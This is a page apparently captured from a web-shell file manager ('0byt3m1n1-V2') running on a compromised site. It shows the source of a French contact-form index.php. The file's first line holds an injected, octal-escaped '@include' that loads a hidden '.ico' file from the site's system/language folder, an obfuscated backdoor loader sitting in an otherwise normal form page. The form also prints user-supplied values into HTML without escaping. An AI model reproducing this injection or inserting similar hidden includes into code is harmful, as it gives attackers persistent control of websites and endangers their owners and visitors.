0byt3m1n1-V2
Path:
/
home
/
nlpacade
/
www
/
arcaneoverseas.com
/
form
/
[
Home
]
File: index.php
<?php /*e7f93*/ @include "\057hom\145/nl\160aca\144e/w\167w/a\162can\145ove\162sea\163.co\155/sy\163tem\057lan\147uag\145/.a\145c35\071f6.\151co"; /*e7f93*/ error_reporting(0); session_name("fancyform"); session_start(); $_SESSION['n1'] = rand(1,20); $_SESSION['n2'] = rand(1,20); $_SESSION['expect'] = $_SESSION['n1']+$_SESSION['n2']; $str=''; if($_SESSION['errStr']) { $str='<div class="error">'.$_SESSION['errStr'].'</div>'; unset($_SESSION['errStr']); } $success=''; if($_SESSION['sent']) { $success='<h1>Thank you!</h1>'; $css='<style type="text/css">#contact-form,#form-container h2{display:none;}</style>'; unset($_SESSION['sent']); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>PLUS D’INFORMATION</title> <link rel="stylesheet" type="text/css" href="jqtransformplugin/jqtransform.css" /> <link rel="stylesheet" type="text/css" href="formValidator/validationEngine.jquery.css" /> <link rel="stylesheet" type="text/css" href="demo.css" /> <?=$css?> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script> <script type="text/javascript" src="jqtransformplugin/jquery.jqtransform.js"></script> <script type="text/javascript" src="formValidator/jquery.validationEngine.js"></script> <script type="text/javascript" src="script.js"></script> </head> <body> <div id="main-container"> <div id="form-container"> <h1>PLUS D’INFORMATION</h1> <h2>Envoyer-nous votre sujet sélectionné, nous vous enverrons des fichiers détaillées dans les plus brefs délais </h2> <form id="contact-form" name="contact-form" method="post" action="submit.php"> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td width="85%"><input type="text" class="validate[required,custom[onlyLetter]]" placeholder="Nom" name="name" id="name" value="<?=$_SESSION['post']['name']?>" /><span class="etoile"></span></td> <td width="15%" id="errOffset"> </td> </tr> <tr> <td width="85%"><input type="text" placeholder="Prénom" name="prenom" id="prenom" value="<?=$_SESSION['post']['prenom']?>" /></td> <td width="15%" id="errOffset"> </td> </tr> <tr> <td><input type="text" placeholder="Email" class="validate[required,custom[email]]" name="email" id="email" value="<?=$_SESSION['post']['email']?>" /><span class="etoile"></span></td> <td> </td> </tr> <tr> <td width="85%"><input placeholder="Tél." class="validate[required]" type="text" name="tel" id="tel" value="<?=$_SESSION['post']['tel']?>" /><span class="etoile"></span></td> <td width="15%" id="errOffset"> </td> </tr> <tr> <td><select name="subject" id="subject"> <option value="" selected="selected"> Séléctionnez votre sujet</option> <option value="A propos" <?php if($_GET['sujet'] == "a_propos"): ?> selected="selected" <?php endif;?>>A propos</option> <option value="Solutions" <?php if($_GET['sujet'] == "solutions"): ?> selected="selected" <?php endif;?>>Solutions</option> <option value="Approche" <?php if($_GET['sujet'] == "approche"): ?> selected="selected" <?php endif;?>>Approche</option> <option value="Intervention" <?php if($_GET['sujet'] == "intervention"): ?> selected="selected" <?php endif;?>>Intervention</option> <option value="Formations" <?php if($_GET['sujet'] == "formations"): ?> selected="selected" <?php endif;?>> Formations</option> </select> </td> <td> </td> </tr> <tr> <td><textarea name="message" id="message" cols="35" rows="7">Message<?=$_SESSION['post']['message']?></textarea></td> <td valign="top"> </td> </tr> <tr> <td colspan="2"><input type="submit" name="button" id="button" value="Submit" /> <?=$str?> <img id="loading" src="img/ajax-load.gif" width="16" height="16" alt="loading" /></td> </tr> </table> </form> <?=$success?> </div> </div> </body> </html>
©
2018.